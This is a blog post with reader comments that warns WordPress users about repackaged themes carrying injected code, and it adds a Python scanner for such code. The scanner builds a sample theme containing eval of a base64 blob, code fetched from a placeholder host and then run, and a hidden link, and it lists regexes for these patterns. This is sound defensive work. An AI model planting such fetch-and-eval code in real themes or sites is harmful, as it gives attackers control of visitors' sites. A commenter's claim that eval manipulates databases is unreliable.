Downloading Themes from 3rd Party sites? Be careful..!
As WordPress users we enjoy the advantage of free themes, right? Obviously. But some bad actors out there use the same advantage to take over your blog. Usually we search for and download themes from third-party sites. Experts say that is not safe, because a repackaged theme may carry malicious code along with it.
Derek, the author at 5thirtyone, explains his own experience. Derek develops and shares WordPress themes for free. But one fine day he received an email from one of his theme users saying:
Alistair recently tipped me off to another WordPress gallery distributing themes which include malicious code / modifications. The tip from Alistair actually began as a support email:
I have one question about the encoded stuff I saw in the header, [...]
After kindly informing Alistair that my theme(s) were not distributed with any code outside of the WordPress scope, I discovered that the code in question was downloaded from WP Sphere. Poking through some of the other recognized themes on the site, I discovered that each of the themes made available for download had been repackaged to include the code above – often in plain view within the header.php file. Paul Carroll took the time to break down what the code above exposes users to.
I think the potential for abuse of this script is huge. I see it as a covert channel to set up WordPress enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.
The same applies to free plugins too. It is always better to trace the original author of the theme or plugin and download directly from their site. If you download from a third-party site and something goes wrong, there is nobody there you can ask or hold responsible.
Already Downloaded? What to Do now??
Don’t worry, there are still ways to scan them. The Theme Authenticity Checker (TAC) plugin scans your entire theme directory for possibly malicious code, such as encoded or obfuscated blocks and unexpected external links. Download it and scan your themes right now. Keep in mind that scanners like this work by pattern matching, so a clean result is not proof that a theme is safe; the reliable check is to compare your copy file by file against the one the original author distributes.
There are also online services such as http://novirusthanks.org which can check your WordPress directory for malicious or injected iframe code.
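The two places this page points at, the eval’d blob planted in header.php and the kind of scan TAC runs over a theme directory, can be tied together in a small script. The following Python scanner is an added example, not code from the original post, from TAC or from novirusthanks.org: it walks a theme directory, flags the constructs that repackaged themes typically carry (eval of decoded or remotely fetched code, decode helpers, hidden iframes and links), and reports a rough score plus the files a human should open. The mini-theme it writes is constructed for the demonstration, and hostnames such as example.invalid are placeholders.

```python
"""Scan a WordPress theme directory for the code patterns that repackaged
third-party themes tend to carry: eval() of decoded or remotely fetched
payloads, obfuscation helpers, and hidden iframes or footer links."""
import base64
import re
import tempfile
from pathlib import Path

# (label, regex, weight). Weight is a rough severity used for the score.
PATTERNS = [
    ("eval", re.compile(r"\beval\s*\(", re.I), 3),
    ("decode-helper", re.compile(
        r"\b(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\(", re.I), 3),
    # preg_replace with the /e modifier evaluates the replacement as PHP
    # (heuristic: assumes '/' is the pattern delimiter).
    ("preg_replace-e", re.compile(r"preg_replace\s*\(\s*['\"]/.*/[a-zA-Z]*e[a-zA-Z]*['\"]"), 3),
    ("remote-include", re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I), 3),
    ("remote-fetch", re.compile(
        r"\b(file_get_contents|fopen|curl_init|fsockopen)\s*\(\s*['\"]https?://", re.I), 2),
    ("hidden-iframe", re.compile(
        r"<iframe[^>]*(display\s*:\s*none|visibility\s*:\s*hidden|(width|height)\s*=\s*['\"]?0\b)", re.I), 3),
    ("hidden-link", re.compile(r"<a\b[^>]*(display\s*:\s*none|visibility\s*:\s*hidden)", re.I), 2),
    # A long base64-looking literal is usually an encoded payload.
    ("long-base64-literal", re.compile(r"['\"][A-Za-z0-9+/]{100,}={0,2}['\"]"), 2),
]
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm", ".css", ".txt"}


def scan_file(path, root):
    """Return one finding per (line, pattern) hit in a single file."""
    findings = []
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, regex, weight in PATTERNS:
            if regex.search(line):
                findings.append({"file": str(path.relative_to(root)), "line": lineno,
                                 "pattern": label, "weight": weight,
                                 "snippet": line.strip()[:80]})
    return findings


def scan_theme(root):
    """Walk a theme directory and collect findings from every scannable file."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            findings.extend(scan_file(path, root))
    return findings


def risk_score(findings):
    return sum(f["weight"] for f in findings)


def files_to_review(findings):
    return sorted({f["file"] for f in findings})


def write_sample_theme(dest):
    """Write a constructed mini-theme (not a real one): three files carrying
    injected code of the kind seen in repackaged themes, two clean files."""
    dest = Path(dest)
    dest.mkdir(parents=True, exist_ok=True)
    blob = base64.b64encode(b"echo 'constructed dummy payload';").decode()
    files = {
        "header.php": "<?php\n// constructed: decoded blob handed straight to eval\n"
                      f"eval(base64_decode('{blob}'));\n?>\n<html><head><title>x</title></head>\n",
        "relay.php": "<?php\n// constructed: fetch code from a remote host and run it\n"
                     "$code = file_get_contents('http://example.invalid/payload.txt');\n"
                     "eval($code);\n",
        "footer.php": '<div id="credit"><a style="display:none" '
                      'href="http://example.invalid/">injected link</a></div>\n',
        "functions.php": "<?php\nadd_theme_support('post-thumbnails');\n",
        "style.css": "/*\nTheme Name: Constructed Sample\n*/\nbody { margin: 0; }\n",
    }
    for name, body in files.items():
        (dest / name).write_text(body, encoding="utf-8")
    return dest


def demo():
    """Build the sample theme in a temp dir, scan it, return the results."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = write_sample_theme(Path(tmp) / "constructed-theme")
        findings = scan_theme(theme)
    return {"findings": findings, "score": risk_score(findings),
            "files": files_to_review(findings)}


if __name__ == "__main__":
    result = demo()
    for f in result["findings"]:
        print(f"{f['file']}:{f['line']} [{f['pattern']}] {f['snippet']}")
    print("risk score:", result["score"], "files to review:", result["files"])
```

Point `scan_theme()` at a real theme folder (for example `wp-content/themes/your-theme`) to run it against your own install. The patterns are deliberately broad, so expect a few false positives in legitimate code; every hit is a line to read, not a verdict, and the decisive check remains a diff against the author’s original download.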
The day-by-day growth of the blogosphere brings many problems along with the advantages we enjoy, so it is always our responsibility to stay active and cautious. Scan your themes and plugins right now and contact the original author for any support.
Hope you found this useful. Found any suspicious code in your theme or plugin? Share it with us! Happy blogging!
Free themes are risky and also, in many cases, they do not suit the exact demands of the user. I guess if you have the money, a custom designed theme is the way to go.
Yes, obviously it's better to go for custom design. But money matters.
More than 50% of users are using free themes. So hackers got the chance to manipulate them.
Well Lax! I am using the TAC plugin and it is working well. Sometimes what's going on is that free themes are edited with some encoded/malicious stuff and then uploaded to many free theme directories.
First, download it from the theme author's official webpage rather than anywhere else.
I have seen plenty of free theme directories who have added footer links and malicious stuff to a good theme.
Yes, many of them added their link in the footer. As you said, it's always better to download from the author. Thanks for the comments, dude.
[...] for backing up, but I’ve also read suggestions that you should Downloading Themes from 3rd Party sites? Be careful..! – techzoomin.com 06/28/2009 Being a [...]
Thanks for bringing a live example to notice! It will surely help WordPress blog owners to stay alert and scan their theme before applying.
That’s great you found it useful dude. Thanks..
Free themes are downloaded many times a day and there is always a risk. I would say that you must download from a reliable source, one that you can trust.
After you have downloaded, go through the code to see if it’s ok. You would be able to see straight away if it has malicious code or not. The plugin is also great.
This has happened to many people who just download and upload.
If you know a little PHP and HTML, then it's always better to spend some time going through the code. If not, use that plugin.
Thanks for sharing your thoughts George.
You should always check the themes yourself. It is not a difficult task. Learn a little about HTML and you can recognize that nonsense code.
Yes, that's true. If you download from the original author, then you don't need to worry. All these middle dogs are playing the tricks.
I am testing one WordPress template and it has a relay.php file which contains such code. I am pasting the initial part and the end part of this code here. Just tell me whether it is malicious code or not!
Is it a malicious code? Please reply! I need help!
Where is the code? relay.php is something I never heard of in WP themes.
Do check/scan thoroughly with the TAC plugin provided above.
The code is not getting pasted in your comments section. Maybe it is regarded as spam! I will try again.
It is not getting published here…I don’t know why!
Have a look at the source of relay.php, and please reply ASAP. http://livecricketscore.co.cc/relay.txt
After installing the TAC plugin I found that this is some encrypted code! Now should I delete this relay.php file? Will it affect my WordPress theme?
This is almost exactly like what I showed in the post (image).
It starts with eval. Eval is a call for procedure execution which manipulates your database. I'm not sure, but according to my knowledge it's possibly database manipulation code.
Download the same theme from the original author and check whether relay.php is there or not.
Or I strongly recommend you stop using that theme and deactivate it ASAP.
I finally figured out what that relay.php file does. Stay updated with my blog and I am going to write about it soon!
Great post.
Thanks for the heads up. from now i will be extra careful.
Hey Nihar,
Thanks for your comments. That should be done by all of us. Then we can restrict the hackers.
I never thought of this, but you’re completely right. People could alter the theme and put malicious software in it. I’ll be careful from now on.
Great that you found it useful. Thanks dude..
Useful post. Never really thought about that. I'm gonna do a scan right now then.
Do that quickly then.
This is really nice information, i will straight away check for the theme for any such issues.
Thanks for sharing it.
To play safe, download only from popular theme sharing site.